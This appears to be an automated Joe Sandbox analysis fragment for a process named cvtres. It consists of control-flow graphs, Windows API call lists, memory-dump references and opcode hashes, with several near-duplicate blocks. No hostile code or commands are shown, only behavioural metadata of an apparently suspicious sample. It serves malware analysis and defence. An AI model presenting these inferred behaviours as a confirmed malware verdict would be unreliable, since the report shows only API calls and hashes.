7232->7235 7234->7137 7236 9ecd268-9ecd293 7235->7236 7238 9ecd299-9ecd2ab 7236->7238 7239 9ecd2b2-9ecd2dd 7238->7239 7241 9ecd2e3-9ecd2f5 7239->7241 7242 9ecd2fc-9ecd327 7241->7242 7244 9ecd32d-9ecd37b 7242->7244 7247 9ecd671-9ecd682 7244->7247 7248 9ecd381-9ecd3a4 7244->7248 7251 9ecd688-9ecd68f 7247->7251 7252 9ecd9e2-9ecd9e9 7247->7252 7258 9ecd659-9ecd66e 7248->7258 7259 9ecd3aa-9ecd41c 7248->7259 7254 9ecd728-9ecd72f 7251->7254 7255 9ecd695-9ecd6f5 7251->7255 7256 9ecd9ef-9ecda60 7252->7256 7257 9ecda6b-9ecda86 7252->7257 7260 9ecd735-9ecd87a call 9ecb2e0 call 9ecaee8 7254->7260 7261 9ecd8a1-9ecd8a8 7254->7261 7255->7252 7256->7257 7270 9ecd66f 7258->7270 7289 9ecd641-9ecd653 7259->7289 7290 9ecd422-9ecd429 7259->7290 7260->7252 7261->7252 7265 9ecd8ae 7261->7265 7271 9ecd8b3 7265->7271 7270->7270 7276 9ecd8bf-9ecd995 call 9ecb2e0 call 9ecaee8 call 9ecaf30 7271->7276 7342 9ecd9a1 7276->7342 7289->7258 7289->7259 7293 9ecd42f-9ecd53d 7290->7293 7294 9ecd542-9ecd56d 7290->7294 7293->7289 7294->7289 7298 9ecd573-9ecd616 7294->7298 7298->7289 7346 9ecd9a9 7342->7346 7351 9ecd9b0-9ecd9b7 7346->7351 7355 9ecd9c3 7351->7355 7355->7252
                                                                          APIs
                                                                          • DisplayExitWindowsWarnings.USER32 ref: 09ECC9BC
                                                                          • KiUserExceptionDispatcher.NTDLL ref: 09ECCA8D
                                                                          • LdrInitializeThunk.NTDLL ref: 09ECCB7B
                                                                          • KiUserExceptionDispatcher.NTDLL ref: 09ECD077
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.507116356.0000000009EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09EC0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_9ec0000_cvtres.jbxd
                                                                          Similarity
                                                                          • API ID: DispatcherExceptionUser$DisplayExitInitializeThunkWarningsWindows
                                                                          • String ID:
                                                                          • API String ID: 4242710221-0
                                                                          • Opcode ID: f220e7d114788171b9e50513decc085c9e27e847da4319c45f95f1394ecf58fc
                                                                          • Instruction ID: b38ffe7026d9cad65a1f6c5d2371ddcbc69383e53ee9c536695120084093b8a3
                                                                          • Opcode Fuzzy Hash: f220e7d114788171b9e50513decc085c9e27e847da4319c45f95f1394ecf58fc
                                                                          • Instruction Fuzzy Hash: F83207B4A04268CFCB649F70D99879DB7B6BB88305F1085EAD94EA3350CB359E81CF51
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 7374 9ecc764-9ecc77c 7376 9ecc785-9ecc78a 7374->7376 7378 9ecc790-9ecc7a2 7376->7378 7379 9ecc7a9-9ecc7d1 7378->7379 7381 9ecc7d7-9ecc7e9 7379->7381 7382 9ecc7f0-9ecc818 7381->7382 7384 9ecc81e-9ecc830 7382->7384 7385 9ecc837-9ecc85f 7384->7385 7387 9ecc865-9ecc877 7385->7387 7388 9ecc87e-9ecc8a6 7387->7388 7390 9ecc8ac-9ecc8be 7388->7390 7391 9ecc8c5-9ecc8ed 7390->7391 7393 9ecc8f3-9ecc905 7391->7393 7394 9ecc90c-9ecc934 7393->7394 7396 9ecc93a-9ecc94c 7394->7396 7397 9ecc953-9ecc97e 7396->7397 7399 9ecc984-9ecc996 7397->7399 7400 9ecc99d-9ecca06 DisplayExitWindowsWarnings 7399->7400 7404 9ecca0c-9ecca76 7400->7404 7410 9ecca81-9ecca93 KiUserExceptionDispatcher 7404->7410 7411 9ecca9b-9eccaaa 7410->7411 7413 9eccab5 7411->7413 7414 9eccabd-9eccad8 7413->7414 7417 9eccae3 7414->7417 7418 9eccaeb-9eccb06 7417->7418 7421 9eccb11 7418->7421 7422 9eccb19-9eccb34 7421->7422 7425 9eccb3f 7422->7425 7426 9eccb47-9eccb62 7425->7426 7429 9eccb6d-9eccbe1 LdrInitializeThunk 7426->7429 7431 9eccf05 7429->7431 7432 9eccbe7-9eccc0b 7429->7432 7433 9eccf0b-9eccf1d 7431->7433 7437 9eccd64-9eccd88 7432->7437 7438 9eccc11 7432->7438 7435 9eccf24-9eccf4f 7433->7435 7442 9eccf55-9eccf67 7435->7442 7446 9eccd8e-9eccd90 7437->7446 7447 9eccd8a 7437->7447 7438->7437 7440 9eccc17-9eccd58 7438->7440 7528 9eccd5f 7440->7528 7445 9eccf6e-9eccf99 7442->7445 7453 9eccf9f-9eccfb1 7445->7453 7452 9eccd97-9eccdc1 7446->7452 7450 9eccd8c 7447->7450 7451 9eccd92 7447->7451 7450->7446 7451->7452 7461 9eccdc7-9eccdc9 7452->7461 7462 9eccdc3 7452->7462 7456 9eccfb8-9eccfe3 7453->7456 7464 9eccfe9-9eccffb 7456->7464 7463 9eccdd0-9eccdd6 7461->7463 7465 9eccdcb 7462->7465 7466 9eccdc5 7462->7466 7463->7431 7467 9eccddc-9eccecf 7463->7467 7469 9ecd002-9ecd02d 7464->7469 7465->7463 7466->7461 7525 9ecceda 7467->7525 7475 9ecd033-9ecd045 7469->7475 7478 9ecd04c-9ecd089 KiUserExceptionDispatcher 7475->7478 7482 9ecd093-9ecd0a5 7478->7482 7485 9ecd0ac-9ecd0d7 7482->7485 7490 9ecd0dd-9ecd0ef 7485->7490 7493 9ecd0f6-9ecd121 7490->7493 7498 9ecd127-9ecd139 7493->7498 7501 9ecd140-9ecd16b 7498->7501 7507 9ecd171-9ecd183 7501->7507 7508 9ecd18a-9ecd1b5 7507->7508 7514 9ecd1bb-9ecd1cd 7508->7514 7517 9ecd1d4-9ecd1ff 7514->7517 7522 9ecd205-9ecd217 7517->7522 7526 9ecd21e-9ecd249 7522->7526 7525->7431 7529 9ecd24f-9ecd261 7526->7529 7528->7431 7530 9ecd268-9ecd293 7529->7530 7532 9ecd299-9ecd2ab 7530->7532 7533 9ecd2b2-9ecd2dd 7532->7533 7535 9ecd2e3-9ecd2f5 7533->7535 7536 9ecd2fc-9ecd327 7535->7536 7538 9ecd32d-9ecd37b 7536->7538 7541 9ecd671-9ecd682 7538->7541 7542 9ecd381-9ecd3a4 7538->7542 7545 9ecd688-9ecd68f 7541->7545 7546 9ecd9e2-9ecd9e9 7541->7546 7552 9ecd659-9ecd66e 7542->7552 7553 9ecd3aa-9ecd41c 7542->7553 7548 9ecd728-9ecd72f 7545->7548 7549 9ecd695-9ecd6f5 7545->7549 7550 9ecd9ef-9ecda60 7546->7550 7551 9ecda6b-9ecda86 7546->7551 7554 9ecd735-9ecd87a call 9ecb2e0 call 9ecaee8 7548->7554 7555 9ecd8a1-9ecd8a8 7548->7555 7549->7546 7550->7551 7564 9ecd66f 7552->7564 7583 9ecd641-9ecd653 7553->7583 7584 9ecd422-9ecd429 7553->7584 7554->7546 7555->7546 7559 9ecd8ae 7555->7559 7565 9ecd8b3 7559->7565 7564->7564 7570 9ecd8bf-9ecd995 call 9ecb2e0 call 9ecaee8 call 9ecaf30 7565->7570 7636 9ecd9a1 7570->7636 7583->7552 7583->7553 7587 9ecd42f-9ecd53d 7584->7587 7588 9ecd542-9ecd56d 7584->7588 7587->7583 7588->7583 7592 9ecd573-9ecd616 7588->7592 7592->7583 7640 9ecd9a9 7636->7640 7645 9ecd9b0-9ecd9b7 7640->7645 7649 9ecd9c3 7645->7649 7649->7546
                                                                          APIs
                                                                          • DisplayExitWindowsWarnings.USER32 ref: 09ECC9BC
                                                                          • KiUserExceptionDispatcher.NTDLL ref: 09ECCA8D
                                                                          • LdrInitializeThunk.NTDLL ref: 09ECCB7B
                                                                          • KiUserExceptionDispatcher.NTDLL ref: 09ECD077
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.507116356.0000000009EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09EC0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_9ec0000_cvtres.jbxd
                                                                          Similarity
                                                                          • API ID: DispatcherExceptionUser$DisplayExitInitializeThunkWarningsWindows
                                                                          • String ID:
                                                                          • API String ID: 4242710221-0
                                                                          • Opcode ID: bb266e461c9e138fb9b9d9cc168a4796a0c869b44df54128143aef91ebe9baf3
                                                                          • Instruction ID: 74836d270905b4bce99714c2822ec62d8548351fe66ab71595dbbe6ec73701b8
                                                                          • Opcode Fuzzy Hash: bb266e461c9e138fb9b9d9cc168a4796a0c869b44df54128143aef91ebe9baf3
                                                                          • Instruction Fuzzy Hash: 413208B4A04268CFCB649F30D99879DB7B6BB88305F1085EAD94EA3350CB358E81CF51
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 7668 9ecc7ab-9ecc7c3 7670 9ecc7cc-9ecc7d1 7668->7670 7672 9ecc7d7-9ecc7e9 7670->7672 7673 9ecc7f0-9ecc818 7672->7673 7675 9ecc81e-9ecc830 7673->7675 7676 9ecc837-9ecc85f 7675->7676 7678 9ecc865-9ecc877 7676->7678 7679 9ecc87e-9ecc8a6 7678->7679 7681 9ecc8ac-9ecc8be 7679->7681 7682 9ecc8c5-9ecc8ed 7681->7682 7684 9ecc8f3-9ecc905 7682->7684 7685 9ecc90c-9ecc934 7684->7685 7687 9ecc93a-9ecc94c 7685->7687 7688 9ecc953-9ecc97e 7687->7688 7690 9ecc984-9ecc996 7688->7690 7691 9ecc99d-9ecca06 DisplayExitWindowsWarnings 7690->7691 7695 9ecca0c-9ecca76 7691->7695 7701 9ecca81-9ecca93 KiUserExceptionDispatcher 7695->7701 7702 9ecca9b-9eccaaa 7701->7702 7704 9eccab5 7702->7704 7705 9eccabd-9eccad8 7704->7705 7708 9eccae3 7705->7708 7709 9eccaeb-9eccb06 7708->7709 7712 9eccb11 7709->7712 7713 9eccb19-9eccb34 7712->7713 7716 9eccb3f 7713->7716 7717 9eccb47-9eccb62 7716->7717 7720 9eccb6d-9eccbe1 LdrInitializeThunk 7717->7720 7722 9eccf05 7720->7722 7723 9eccbe7-9eccc0b 7720->7723 7724 9eccf0b-9eccf1d 7722->7724 7728 9eccd64-9eccd88 7723->7728 7729 9eccc11 7723->7729 7726 9eccf24-9eccf4f 7724->7726 7733 9eccf55-9eccf67 7726->7733 7737 9eccd8e-9eccd90 7728->7737 7738 9eccd8a 7728->7738 7729->7728 7731 9eccc17-9eccd58 7729->7731 7819 9eccd5f 7731->7819 7736 9eccf6e-9eccf99 7733->7736 7744 9eccf9f-9eccfb1 7736->7744 7743 9eccd97-9eccdc1 7737->7743 7741 9eccd8c 7738->7741 7742 9eccd92 7738->7742 7741->7737 7742->7743 7752 9eccdc7-9eccdc9 7743->7752 7753 9eccdc3 7743->7753 7747 9eccfb8-9eccfe3 7744->7747 7755 9eccfe9-9eccffb 7747->7755 7754 9eccdd0-9eccdd6 7752->7754 7756 9eccdcb 7753->7756 7757 9eccdc5 7753->7757 7754->7722 7758 9eccddc-9eccecf 7754->7758 7760 9ecd002-9ecd02d 7755->7760 7756->7754 7757->7752 7816 9ecceda 7758->7816 7766 9ecd033-9ecd045 7760->7766 7769 9ecd04c-9ecd089 KiUserExceptionDispatcher 7766->7769 7773 9ecd093-9ecd0a5 7769->7773 7776 9ecd0ac-9ecd0d7 7773->7776 7781 9ecd0dd-9ecd0ef 7776->7781 7784 9ecd0f6-9ecd121 7781->7784 7789 9ecd127-9ecd139 7784->7789 7792 9ecd140-9ecd16b 7789->7792 7798 9ecd171-9ecd183 7792->7798 7799 9ecd18a-9ecd1b5 7798->7799 7805 9ecd1bb-9ecd1cd 7799->7805 7808 9ecd1d4-9ecd1ff 7805->7808 7813 9ecd205-9ecd217 7808->7813 7817 9ecd21e-9ecd249 7813->7817 7816->7722 7820 9ecd24f-9ecd261 7817->7820 7819->7722 7821 9ecd268-9ecd293 7820->7821 7823 9ecd299-9ecd2ab 7821->7823 7824 9ecd2b2-9ecd2dd 7823->7824 7826 9ecd2e3-9ecd2f5 7824->7826 7827 9ecd2fc-9ecd327 7826->7827 7829 9ecd32d-9ecd37b 7827->7829 7832 9ecd671-9ecd682 7829->7832 7833 9ecd381-9ecd3a4 7829->7833 7836 9ecd688-9ecd68f 7832->7836 7837 9ecd9e2-9ecd9e9 7832->7837 7843 9ecd659-9ecd66e 7833->7843 7844 9ecd3aa-9ecd41c 7833->7844 7839 9ecd728-9ecd72f 7836->7839 7840 9ecd695-9ecd6f5 7836->7840 7841 9ecd9ef-9ecda60 7837->7841 7842 9ecda6b-9ecda86 7837->7842 7845 9ecd735-9ecd87a call 9ecb2e0 call 9ecaee8 7839->7845 7846 9ecd8a1-9ecd8a8 7839->7846 7840->7837 7841->7842 7855 9ecd66f 7843->7855 7874 9ecd641-9ecd653 7844->7874 7875 9ecd422-9ecd429 7844->7875 7845->7837 7846->7837 7850 9ecd8ae 7846->7850 7856 9ecd8b3 7850->7856 7855->7855 7861 9ecd8bf-9ecd995 call 9ecb2e0 call 9ecaee8 call 9ecaf30 7856->7861 7927 9ecd9a1 7861->7927 7874->7843 7874->7844 7878 9ecd42f-9ecd53d 7875->7878 7879 9ecd542-9ecd56d 7875->7879 7878->7874 7879->7874 7883 9ecd573-9ecd616 7879->7883 7883->7874 7931 9ecd9a9 7927->7931 7936 9ecd9b0-9ecd9b7 7931->7936 7940 9ecd9c3 7936->7940 7940->7837
                                                                          APIs
                                                                          • DisplayExitWindowsWarnings.USER32 ref: 09ECC9BC
                                                                          • KiUserExceptionDispatcher.NTDLL ref: 09ECCA8D
                                                                          • LdrInitializeThunk.NTDLL ref: 09ECCB7B
                                                                          • KiUserExceptionDispatcher.NTDLL ref: 09ECD077
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.507116356.0000000009EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09EC0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_9ec0000_cvtres.jbxd
                                                                          Similarity
                                                                          • API ID: DispatcherExceptionUser$DisplayExitInitializeThunkWarningsWindows
                                                                          • String ID:
                                                                          • API String ID: 4242710221-0
                                                                          • Opcode ID: ff7c28d34ce1d67b273ca7dca8fee421a00dc5fa97c35f0288a0ea8d891dba19
                                                                          • Instruction ID: 11f9557c7d26fce1099fb16402f3c48861d040ecb72e73a655a067b87873a0cf
                                                                          • Opcode Fuzzy Hash: ff7c28d34ce1d67b273ca7dca8fee421a00dc5fa97c35f0288a0ea8d891dba19
                                                                          • Instruction Fuzzy Hash: 792208B4A04268CFCB649F30D99879DB7B6BB88305F1085EAD94E93350DB359E81CF51
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • DisplayExitWindowsWarnings.USER32 ref: 09ECC9BC
                                                                          • KiUserExceptionDispatcher.NTDLL ref: 09ECCA8D
                                                                          • LdrInitializeThunk.NTDLL ref: 09ECCB7B
                                                                          • KiUserExceptionDispatcher.NTDLL ref: 09ECD077
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.507116356.0000000009EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09EC0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_9ec0000_cvtres.jbxd
                                                                          Similarity
                                                                          • API ID: DispatcherExceptionUser$DisplayExitInitializeThunkWarningsWindows
                                                                          • String ID:
                                                                          • API String ID: 4242710221-0
                                                                          • Opcode ID: 25104fa308b825ca317c4fee3660cc68edeeaebbda7f62c02b5a6369c5d07a2e
                                                                          • Instruction ID: 9cd17f88b6fecbbcf88e37a4f29ec1c899bf16324b966c8faae134361d5db61b
                                                                          • Opcode Fuzzy Hash: 25104fa308b825ca317c4fee3660cc68edeeaebbda7f62c02b5a6369c5d07a2e
                                                                          • Instruction Fuzzy Hash: B62207B4A04268CFCB649F30D9987ADB7B6BB88305F1085EAD94E93350DB359E81CF51
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • DisplayExitWindowsWarnings.USER32 ref: 09ECC9BC
                                                                          • KiUserExceptionDispatcher.NTDLL ref: 09ECCA8D
                                                                          • LdrInitializeThunk.NTDLL ref: 09ECCB7B
                                                                          • KiUserExceptionDispatcher.NTDLL ref: 09ECD077
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.507116356.0000000009EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09EC0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_9ec0000_cvtres.jbxd
                                                                          Similarity
                                                                          • API ID: DispatcherExceptionUser$DisplayExitInitializeThunkWarningsWindows
                                                                          • String ID:
                                                                          • API String ID: 4242710221-0
                                                                          • Opcode ID: 00b451283b247013a2e620e3bf686f7dcc5d00dfe09b1551b4bf17700c86ab05
                                                                          • Instruction ID: 1956a1e0caa4250b0d5d0200478191c98fbf828e992c5d058952a2692bf69ff0
                                                                          • Opcode Fuzzy Hash: 00b451283b247013a2e620e3bf686f7dcc5d00dfe09b1551b4bf17700c86ab05
                                                                          • Instruction Fuzzy Hash: 602207B4A04268CFCB649F70D9987ADB7B6BB88305F1085EAD94E93350DB358E81CF51
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • DisplayExitWindowsWarnings.USER32 ref: 09ECC9BC
                                                                          • KiUserExceptionDispatcher.NTDLL ref: 09ECCA8D
                                                                          • LdrInitializeThunk.NTDLL ref: 09ECCB7B
                                                                          • KiUserExceptionDispatcher.NTDLL ref: 09ECD077
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.507116356.0000000009EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09EC0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_9ec0000_cvtres.jbxd
                                                                          Similarity
                                                                          • API ID: DispatcherExceptionUser$DisplayExitInitializeThunkWarningsWindows
                                                                          • String ID:
                                                                          • API String ID: 4242710221-0
                                                                          • Opcode ID: b662c31162d2438efa50cc1ed273be8902728ae12d3a2342c95163019f3da562
                                                                          • Instruction ID: 09b15fa226993e9dba247101f59efc89316f2f1351165e48fa14e64606dc5e28
                                                                          • Opcode Fuzzy Hash: b662c31162d2438efa50cc1ed273be8902728ae12d3a2342c95163019f3da562
                                                                          • Instruction Fuzzy Hash: 662206B4A04268CFCB649F70D9987ADB7B6BB88305F1085EAD94E93350DB358E81CF51
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • DisplayExitWindowsWarnings.USER32 ref: 09ECC9BC
                                                                          • KiUserExceptionDispatcher.NTDLL ref: 09ECCA8D
                                                                          • LdrInitializeThunk.NTDLL ref: 09ECCB7B
                                                                          • KiUserExceptionDispatcher.NTDLL ref: 09ECD077
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.507116356.0000000009EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09EC0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_9ec0000_cvtres.jbxd
                                                                          Similarity
                                                                          • API ID: DispatcherExceptionUser$DisplayExitInitializeThunkWarningsWindows
                                                                          • String ID:
                                                                          • API String ID: 4242710221-0
                                                                          • Opcode ID: 93b2bd97150621dd5a8ce09a9217dbef5bf1146c3309d600fdf025624972afea
                                                                          • Instruction ID: ef8bb63621c12f3af55ea71184ca0071afad9dc316ae13c7a6528bb0dbcf6860
                                                                          • Opcode Fuzzy Hash: 93b2bd97150621dd5a8ce09a9217dbef5bf1146c3309d600fdf025624972afea
                                                                          • Instruction Fuzzy Hash: C12206B4A04268CFCB649F70D9987ADB7B6BB88305F1085EAD94E93350DB358E81CF51
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • DisplayExitWindowsWarnings.USER32 ref: 09ECC9BC
                                                                          • KiUserExceptionDispatcher.NTDLL ref: 09ECCA8D
                                                                          • LdrInitializeThunk.NTDLL ref: 09ECCB7B
                                                                          • KiUserExceptionDispatcher.NTDLL ref: 09ECD077
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.507116356.0000000009EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09EC0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_9ec0000_cvtres.jbxd
                                                                          Similarity
                                                                          • API ID: DispatcherExceptionUser$DisplayExitInitializeThunkWarningsWindows
                                                                          • String ID:
                                                                          • API String ID: 4242710221-0
                                                                          • Opcode ID: e18f02c5ae44716fcdde705f9c1569c253bb6d87e9aac76692a1d6c8d7a205aa
                                                                          • Instruction ID: c391db5376cb564c68a9a937c8d7311a27939b499f37d8772b5045cf74c7731a
                                                                          • Opcode Fuzzy Hash: e18f02c5ae44716fcdde705f9c1569c253bb6d87e9aac76692a1d6c8d7a205aa
                                                                          • Instruction Fuzzy Hash: D91206B4A04268CFCB249F74D9987ADB7B6BB88305F1085EAD94E93350DB358E81CF51
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • DisplayExitWindowsWarnings.USER32 ref: 09ECC9BC
                                                                          • KiUserExceptionDispatcher.NTDLL ref: 09ECCA8D
                                                                          • LdrInitializeThunk.NTDLL ref: 09ECCB7B
                                                                          • KiUserExceptionDispatcher.NTDLL ref: 09ECD077
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.507116356.0000000009EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09EC0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_9ec0000_cvtres.jbxd
                                                                          Similarity
                                                                          • API ID: DispatcherExceptionUser$DisplayExitInitializeThunkWarningsWindows
                                                                          • String ID:
                                                                          • API String ID: 4242710221-0
                                                                          • Opcode ID: d3729a0b41a3da14930da44e5a4216ffd757febe1fe22bd565d66a1af7cb0d3e
                                                                          • Instruction ID: 9859bb8baae913f16c676a8c519d1780fa8fc00ba21e34813be12d7a042dc69b
                                                                          • Opcode Fuzzy Hash: d3729a0b41a3da14930da44e5a4216ffd757febe1fe22bd565d66a1af7cb0d3e
                                                                          • Instruction Fuzzy Hash: ED1216B4A04268CFCB249F70D9987ADB7B6BB88305F1085EAD94E93350DB358E81CF51
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • DisplayExitWindowsWarnings.USER32 ref: 09ECC9BC
                                                                          • KiUserExceptionDispatcher.NTDLL ref: 09ECCA8D
                                                                          • LdrInitializeThunk.NTDLL ref: 09ECCB7B
                                                                          • KiUserExceptionDispatcher.NTDLL ref: 09ECD077
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.507116356.0000000009EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09EC0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_9ec0000_cvtres.jbxd
                                                                          Similarity
                                                                          • API ID: DispatcherExceptionUser$DisplayExitInitializeThunkWarningsWindows
                                                                          • String ID:
                                                                          • API String ID: 4242710221-0
                                                                          • Opcode ID: 215139b86020a3782aa61a1411b145ea2a6483ca15d865ce58e68148a8eef7d9
                                                                          • Instruction ID: 04eb148b738551bca5c9ba6acf570a9e05b1c90df7e00da119c47d3fcd0f0859
                                                                          • Opcode Fuzzy Hash: 215139b86020a3782aa61a1411b145ea2a6483ca15d865ce58e68148a8eef7d9
                                                                          • Instruction Fuzzy Hash: B21215B4A04268CFCB649F70D9987ADB7B6BB88305F1086E9D90E93350DB358E81CF51
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.499449012.0000000000B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_b50000_cvtres.jbxd
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: ad855eb2d1c4e51e3a46ec8c54c7e01488bc8d8c1556db2cd7366a32c6d83b13
                                                                          • Instruction ID: 8ee1173073b8a12b7f12938fd67af2a42336f7b608e12c816544bf606d98989f
                                                                          • Opcode Fuzzy Hash: ad855eb2d1c4e51e3a46ec8c54c7e01488bc8d8c1556db2cd7366a32c6d83b13
                                                                          • Instruction Fuzzy Hash: B6613E30A00208DBDB18DFB5D9997AE7BF5AF84305F1045A8E825A7350DF79DD49CB50
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • GetUserNameW.ADVAPI32(00000000,00000000), ref: 09ECB21B
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.507116356.0000000009EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09EC0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_9ec0000_cvtres.jbxd
                                                                          Similarity
                                                                          • API ID: NameUser
                                                                          • String ID:
                                                                          • API String ID: 2645101109-0
                                                                          • Opcode ID: 34a548bb88be0ab28f8acb63f1e3481e244328430e8f264d008b23e01e7bd171
                                                                          • Instruction ID: 3c4ff7d2278a871e8df8af1bd5df9e134334c02f1d1f5ad5b33f99768cf2f2a9
                                                                          • Opcode Fuzzy Hash: 34a548bb88be0ab28f8acb63f1e3481e244328430e8f264d008b23e01e7bd171
                                                                          • Instruction Fuzzy Hash: 7E5125B0E002588FDB18CFA9C98A7DEBBB5BF48318F18811DE855AB350D774A845CF94
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • GetCurrentProcess.KERNEL32 ref: 06966BB0
                                                                          • GetCurrentThread.KERNEL32 ref: 06966BED
                                                                          • GetCurrentProcess.KERNEL32 ref: 06966C2A
                                                                          • GetCurrentThreadId.KERNEL32 ref: 06966C83
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.501394160.0000000006960000.00000040.00000800.00020000.00000000.sdmp, Offset: 06960000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_6960000_cvtres.jbxd
                                                                          Similarity
                                                                          • API ID: Current$ProcessThread
                                                                          • String ID:
                                                                          • API String ID: 2063062207-0
                                                                          • Opcode ID: ab49233d000f1586b7500804eb35d97f499edc0a57aae148c66017d0f7fd72b0
                                                                          • Instruction ID: 22d16b25e0fd1c004a691cb65707085e390b1e3a4906c9331e615c6ca0f5d34d
                                                                          • Opcode Fuzzy Hash: ab49233d000f1586b7500804eb35d97f499edc0a57aae148c66017d0f7fd72b0
                                                                          • Instruction Fuzzy Hash: 635164B49007488FDB50CFAAC548BDEBBF0EF49318F248559E049A7750D7746844CB65
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • GetCurrentProcess.KERNEL32 ref: 06966BB0
                                                                          • GetCurrentThread.KERNEL32 ref: 06966BED
                                                                          • GetCurrentProcess.KERNEL32 ref: 06966C2A
                                                                          • GetCurrentThreadId.KERNEL32 ref: 06966C83
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.501394160.0000000006960000.00000040.00000800.00020000.00000000.sdmp, Offset: 06960000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_6960000_cvtres.jbxd
                                                                          Similarity
                                                                          • API ID: Current$ProcessThread
                                                                          • String ID:
                                                                          • API String ID: 2063062207-0
                                                                          • Opcode ID: ef1f862269a162e37d60903b7b929c13561f6650998cd57e30b1a2a4671a1373
                                                                          • Instruction ID: ec914c642145ec2a1b54aaa5564ec988db241acf7f2556b48dbf787d9babb298
                                                                          • Opcode Fuzzy Hash: ef1f862269a162e37d60903b7b929c13561f6650998cd57e30b1a2a4671a1373
                                                                          • Instruction Fuzzy Hash: 8C5143B0D007488FDB50CFAAD548BDEBBF0EB49318F248559E40AA7750D7346884CB66
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • KiUserExceptionDispatcher.NTDLL ref: 09ECCA8D
                                                                          • LdrInitializeThunk.NTDLL ref: 09ECCB7B
                                                                          • KiUserExceptionDispatcher.NTDLL ref: 09ECD077
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.507116356.0000000009EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09EC0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_9ec0000_cvtres.jbxd
                                                                          Similarity
                                                                          • API ID: DispatcherExceptionUser$InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2638914809-0
                                                                          • Opcode ID: 2ff6fc29a50c7b25c9e20e85802ae60396904c97ed88efb9dcbf3098e5d3c045
                                                                          • Instruction ID: bcc901da7c43c48c409f06a4a53c6e0cd8e0ba02bce7e676a8ac75b5e953bf54
                                                                          • Opcode Fuzzy Hash: 2ff6fc29a50c7b25c9e20e85802ae60396904c97ed88efb9dcbf3098e5d3c045
                                                                          • Instruction Fuzzy Hash: 741215B4A04268CFCB649F74D9987ADB7B6BB88305F1086E9D90E93350DB358E81CF51
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%
